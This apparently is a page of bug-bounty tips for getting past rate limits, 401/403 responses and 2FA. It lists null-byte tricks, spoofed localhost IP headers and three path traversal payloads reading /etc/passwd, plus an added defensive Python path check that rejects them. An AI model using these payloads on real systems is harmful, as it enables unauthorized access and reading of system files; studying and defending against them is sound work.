Rate Limit Bypass / 2FA / OTP Bypass
Want to bypass a rate limit? Try bypassing it by adding a null payload (%00, %0d%0a, %09, %0C, %20, %0) to the email. Doesn't work? Just try adding a "blank space" to the email; it works!
Every time you face a 401 Unauthorized response, add this header to the request: X-Custom-IP-Authorization: 127.0.0.1 #bugbountytips / X-Forwarded-Origin: 127.0.0.1
Bug Bounty Technique:
GET /page.php?path=../../etc/passwd
Forbidden 403?
Try one of these:
(1) ../../../etc/passwd%00
(2) ....//....//....//etc/passwd
(3) %252e%252e%252fetc%252fpasswd
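Each of the three variants above targets a different weak filter (suffix matching, single-pass "../" stripping, single decoding). The following added example, not from the original page, shows a server-side path check that holds against all three; BASE_DIR and the function names are hypothetical, and raw_value is assumed to be the parameter as it appears on the wire.

```python
import os
from urllib.parse import unquote

BASE_DIR = os.path.realpath("/var/www/pages")  # assumed content root (hypothetical)


def single_pass_strip(value: str) -> str:
    """Weak filter, for contrast: one pass of removal turns '....//' into '../'."""
    return value.replace("../", "")


def safe_resolve(raw_value: str) -> str:
    """Return an absolute path inside BASE_DIR, or raise ValueError."""
    # If the framework already decoded the parameter, drop this first unquote.
    value = unquote(raw_value)
    # Layered encoding (%252e -> %2e -> .) only helps if a later layer decodes again.
    if unquote(value) != value:
        raise ValueError("nested percent-encoding")
    # NUL and other control characters can truncate or split paths in lower layers.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        raise ValueError("control character in path")
    # Canonicalize, then test containment. The input string is never "cleaned".
    candidate = os.path.realpath(os.path.join(BASE_DIR, value))
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        raise ValueError("path escapes base directory")
    return candidate


def verdict(raw_value: str) -> str:
    """Human-readable outcome for one request parameter."""
    try:
        safe_resolve(raw_value)
        return "allowed"
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # Payloads copied from the list above, plus one ordinary page name (constructed).
    for p in ("../../../etc/passwd%00", "....//....//....//etc/passwd",
              "%252e%252e%252fetc%252fpasswd", "docs/intro.html"):
        print(f"{p!r:40} {verdict(p)}")
```

Variant (2) is allowed as-is because "...." is only an odd directory name under BASE_DIR; it becomes a traversal only after a stripping filter rewrites it, which is why the check canonicalizes and compares instead of editing the input.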
2FA - https://mazoka777.medium.com/two-factor-authentication-bypass-4c814627f8c3
I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips The last /setup/ endpoint was by the attacker, while the first one is as the victim.